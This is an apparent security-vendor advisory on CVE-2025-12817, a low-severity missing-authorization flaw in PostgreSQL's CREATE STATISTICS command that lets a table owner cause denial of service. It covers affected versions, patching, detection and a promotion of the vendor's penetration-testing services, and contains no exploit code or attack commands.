CVE-2025-12817: Low Vulnerability in PostgreSQL CREATE STATISTICS Command

CVE-2025-12817 is classified as a low-severity vulnerability with a CVSS score of 3.1. This vulnerability allows a table owner to achieve denial of service against other CREATE STATISTICS users by creating in any schema. A later CREATE STATISTICS for the same name, from a user having the CREATE privilege, would then fail. This can disrupt normal operations, particularly in environments where multiple users rely on the CREATE STATISTICS functionality.

The vulnerability affects versions prior to PostgreSQL 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23. As this issue is classified as low severity, organizations should consider the potential impact on their systems and evaluate the need for remediation based on their specific usage of PostgreSQL.

Currently, there is no known public exploit for this vulnerability, and it is not actively being exploited in the wild. However, it is advisable for organizations to monitor their systems and apply any relevant patches or updates as they become available to mitigate the risks associated with this vulnerability.

Organizations should prioritize patching PostgreSQL versions to prevent potential disruptions caused by this vulnerability. Although the urgency is classified as low, addressing this issue can help maintain system integrity and availability.

Vulnerability Details

CVE-2025-12817 is characterized by a missing authorization in the PostgreSQL CREATE STATISTICS command. This flaw allows a table owner to create statistics in any schema, potentially leading to denial of service for other users attempting to create statistics with the same name. The affected systems include all versions prior to PostgreSQL 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23.

The CVSS score of 3.1 indicates low severity, reflecting a high attack complexity and low privileges required for exploitation. The potential impact on availability is noted, as it could disrupt users who share the same statistical names.

Technical Analysis

The root cause of this vulnerability lies in the lack of proper authorization checks during the execution of the CREATE STATISTICS command. Attackers with sufficient privileges can exploit this flaw by creating statistics with names that other users intend to use, effectively blocking their operations.

The attack vector is classified as network-based, meaning that exploitation can occur remotely. The attack complexity is categorized as high, necessitating that an attacker possesses low privileges, specifically the ability to create statistics, to exploit this vulnerability. User interaction is not required.

Regarding the impacts, confidentiality remains unaffected, while integrity is also not compromised. However, availability may be impacted due to the nature of the denial of service potential. This highlights the need for organizations to be vigilant about their PostgreSQL configurations and user privileges.

Risk & Impact Analysis

The risk to organizations includes the potential for denial of service against legitimate users who rely on the CREATE STATISTICS functionality. If not addressed, this vulnerability could lead to significant disruptions within environments utilizing PostgreSQL for critical applications.

The urgency for remediation, while categorized as low, should still be considered based on the operational context. The potential blast radius may vary, especially in multi-user environments where multiple users create statistics simultaneously. Organizations should assess their specific deployment of PostgreSQL and consider the implications of this vulnerability.

Given the CVSS score of 3.1 and the absence of known exploitation, organizations should still schedule remediation during their regular maintenance cycles to ensure they are using the latest supported versions.

Exploitation Status

Affected Versions

All versions prior to PostgreSQL 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23 are affected by this vulnerability. Organizations should ensure they upgrade to the latest versions to mitigate this risk.

Mitigation & Remediation

Organizations should prioritize patching PostgreSQL installations to versions 18.1, 17.7, 16.11, 15.15, 14.20, and 13.23 or later. If immediate patching is not possible, consider configuration hardening to limit the ability of users to create statistics in shared schemas.

Monitoring for unusual activity related to CREATE STATISTICS commands can also be beneficial. Implementing network controls to restrict access to PostgreSQL instances can help reduce the attack surface.

For further assistance, organizations can explore our penetration testing services to assess the security posture of their databases.

Detection Guidance

To detect potential exploitation of this vulnerability, organizations should monitor logs for unusual CREATE STATISTICS activity. Any unexpected failures or errors during the execution of this command should be investigated.

Behavioral anomalies in the creation of statistics, particularly from users with low privileges, should trigger alerts. Additional network signatures may also be developed to identify unauthorized attempts to exploit this vulnerability.

AppSecure Threat Intelligence Insight

The long-term significance of CVE-2025-12817 lies in its demonstration of how missing authorization checks can lead to disruptions in database environments. Security teams should be aware of similar patterns as they assess their database permissions.

This vulnerability underscores the importance of rigorous permission management and the need for proactive security measures. To strengthen defenses, organizations can refer to our penetration testing methodology for best practices.

Additionally, recognizing the trends in vulnerabilities like this can help inform future security strategies. Organizations should consider reviewing their security posture regularly and may find benefit in exploring our vulnerability management program to better prepare for emerging risks.